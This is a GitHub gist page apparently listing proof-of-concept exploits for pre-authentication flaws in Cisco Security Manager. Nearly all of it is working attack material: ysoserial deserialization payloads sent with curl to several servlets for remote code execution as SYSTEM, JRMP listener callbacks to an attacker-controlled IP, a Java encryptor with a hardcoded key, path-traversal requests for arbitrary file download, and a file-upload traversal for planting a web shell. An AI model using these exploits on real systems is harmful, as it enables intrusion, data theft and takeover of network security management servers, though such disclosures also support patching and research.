Skip to content

Instantly share code, notes, and snippets.

@pnigos

pnigos/CSM_pocs.md

Forked from Frycos/CSM_pocs.md
Created November 17, 2020 14:05
Show Gist options
  • Save pnigos/d28739786d84299eab6a4e47d7a63c04 to your computer and use it in GitHub Desktop.
Save pnigos/d28739786d84299eab6a4e47d7a63c04 to your computer and use it in GitHub Desktop.
Download ZIP

Revisions

  1. @Frycos Frycos created this gist Nov 16, 2020.
    159 changes: 159 additions & 0 deletions CSM_pocs.md
    View file
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,159 @@
    # TLDR

    > Cisco Security Manager is an enterprise-class security management application that provides insight into
    and control of Cisco security and network devices. Cisco Security Manager offers comprehensive security
    management (configuration and event management) across a wide range of Cisco security appliances,
    including Cisco ASA Adaptive Security Appliances, Cisco IPS Series Sensor Appliances, Cisco Integrated Services Routers (ISRs),
    Cisco Firewall Services Modules (FWSMs), Cisco Catalyst, Cisco Switches and many more.
    Cisco Security Manager allows you to manage networks of all sizes efficiently-from small networks to large networks consisting of hundreds of devices.

    Several **pre-auth vulnerabilities** were submitted to Cisco on 2020-07-13 and (according to Cisco) **patched in version 4.22** on 2020-11-10. Release notes didn't state anything about the vulnerabilities, security advisories were not published. All payload are processed in the context of **NT AUTHORITY\SYSTEM**.

    Requirement: Download *commons-beanutils-1.6.1.jar* from central maven repository.

    # Remote Code Execution SecretService.jsp :-)

    `
    java -cp ./commons-beanutils-1.6.1.jar:[YOUR_PATH]]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.GeneratePayload CommonsBeanutils1 "cmd.exe /c calc.exe" > payload_CommonsBeanutils
    `

    `
    curl -k --request POST --data-binary "@payload_CommonsBeanutils" https://[TARGET_HOST]/CSCOnm/servlet/SecretService.jsp
    `

    # Remote Code Execution CsJaasServiceServlet

    Compile JaasEncryptor.java and replace the *b64Payload* content:

    ```
    import java.security.InvalidKeyException;
    import java.util.Base64;
    import com.cisco.nm.cmf.security.jaas.BlobCrypt;
    public class JaasEncryptor {
    public static void main(String args[]) {
    String b64Payload = "rO0ABXN9AAAAAQAaamF2YS5ybWkucmVnaXN0cnkuUmVnaXN0cnl4cgAXamF2YS5sYW5nLnJlZmxlY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhhbmRsZXI7eHBzcgAtamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdEludm9jYXRpb25IYW5kbGVyAAAAAAAAAAICAAB4cgAcamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdNNhtJEMYTMeAwAAeHB3MQAKVW5pY2FzdFJlZgAIMTAuMC4wLjIAAAG7AAAAAEBnvkQAAAAAAAAAAAAAAAAAAAB4";
    byte[] payload = Base64.getDecoder().decode(b64Payload);
    byte[] key = new byte[]{-100, 76, -23, 87, 125, 0, 5, 94, 12, 76, 37, -84, 36, 78, 123, 5};
    byte[] enc = BlobCrypt.encryptArray(payload, key);
    System.out.println("Encrypted payload: " + Base64.getEncoder().encodeToString(enc));
    byte[] dec = BlobCrypt.decryptArray(enc, key);
    }
    }
    ```

    Prepare JRMP Listener:

    `
    java -cp [YOUR_PATH]/commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 443
    `

    `
    java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]]:443' | base64 -w0
    `

    Compile encrypted payload:

    `
    javac -cp [YOUR_PATH]]/server_jars_classes/jars.jar:./ JaasEncryptor2.java; java -cp [YOUR_PATH]/server_jars_classes/jars.jar:./ JaasEncryptor
    `

    Send payload to Servlet with parameters *cmd=data* + new line + *data=[ENCRYPTED_PAYLOAD]*.

    # Remote Code Execution AuthTokenServlet

    Prepare JRMP Listener:

    `
    java -cp [YOUR_PATH]/commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1337 CommonsBeanutils1 "cmd.exe /c calc.exe"
    `

    `
    java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]]:1337' > payload_JRMP1_2
    `

    Send request:

    `
    curl -k --request POST --data-binary "@payload_JRMP1_2" https://[TARGET_IP]/CSCOnm/servlet/com.cisco.nm.cmf.servlet.AuthTokenServlet
    `

    # Remote Code Execution ClientServicesServlet

    Prepare JRMP listener:

    `
    java -cp [YOUR_PATH]/commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1337 CommonsBeanutils1 "cmd.exe /c calc.exe"
    `

    `
    java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]:1337' > payload_JRMP1_3
    `

    Send request:

    `
    curl -k --request POST --data-binary "@payload_JRMP1_3" https://[TARGET_IP]/CSCOnm/servlet/com.cisco.nm.cmf.servlet.ClientServicesServlet
    `

    # Remote Code Execution CTMServlet

    `
    java -cp ./commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.GeneratePayload CommonsBeanutils1 "cmd.exe /c calc.exe" > payload_CommonsBeanutils1_2
    `

    `
    curl -i -s -k -X $'POST' -H $'Content-Type: application/octet-stream' -H $'CTM-URN: com-cisco-nm-vms-ipintel-IpIntelligenceApi' -H $'CTM-VERSION: 1.5' -H $'CTM-PRODUCT-ID: /C:/Program Files (x86)/CSCOpx/MDC/tomcat/vms/athena/WEB-INF/lib/' -H $'Cache-Control: no-cache' -H $'Pragma: no-cache' -H $'User-Agent: Java/1.8.0_222' -H $'Host: [TARGET_IP]' -H $'Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2' -H $'Connection: keep-alive' --data-binary "@payload_CommonsBeanutils1_2" $'https://[TARGET_IP]/athena/CTMServlet'
    `

    # Arbitrary File Download XdmConfigRequestHandler

    `
    GET /athena/xdmProxy/xdmConfig[RELATIVE_PATH_TO_FILE]
    `

    # Arbitrary File Download XdmResourceRequestHandler

    `
    GET /athena/xdmProxy/xdmResources[RELATIVE_PATH_TO_FILE]?dmTargetType=TARGET.IDS&dmOsVersion=7.&command=editConfigDelta
    `

    # Arbitrary File Upload XmpFileUploadServlet

    Write a web shell e.g.

    `
    POST /cwhp/XmpFileUploadServlet?maxFileSize=100
    `

    Normal multi-part e.g. writing web shell in *filename* with *../../MDC/tomcat/webapps/cwhp/testme.jsp*.

    # Arbitrary File Download XmpFileDownloadServlet

    `GET /cwhp/XmpFileDownloadServlet?parameterName=downloadDoc&downloadDirectory=[RELATIVE_PATH_TO_DIRECTORY]&readmeText=1`

    This will respond with a ZIP file containing all files from the directory.

    # Arbitrary File Download SampleFileDownloadServlet

    `GET /cwhp/SampleFileDownloadServlet?downloadZipFileName=pwned&downloadFiles=README&downloadLocation=[RELATIVE_PATH_TO_DIRECTORY]`

    This will respond with a ZIP file containing all files from the directory.


    # Arbitrary File Download resultsFrame.jsp

    `GET /athena/itf/resultsFrame.jsp?filename=[RELATIVE_PATH_TO_FILE]`

    # Remote Code Execution SecretServiceServlet

    See also https://de.tenable.com/security/research/tra-2017-23

    `java -cp [YOUR_PATH]/commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1337 CommonsBeanutils1 "cmd.exe /c calc.exe"`

    `java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]:1337' > payload_JRMP1_2`

    `curl -k --request POST --data-binary "@payload_JRMP1_2" https://[TARGET_IP]/CSCOnm/servlet/com.cisco.nm.cmf.servlet.SecretServiceServlet`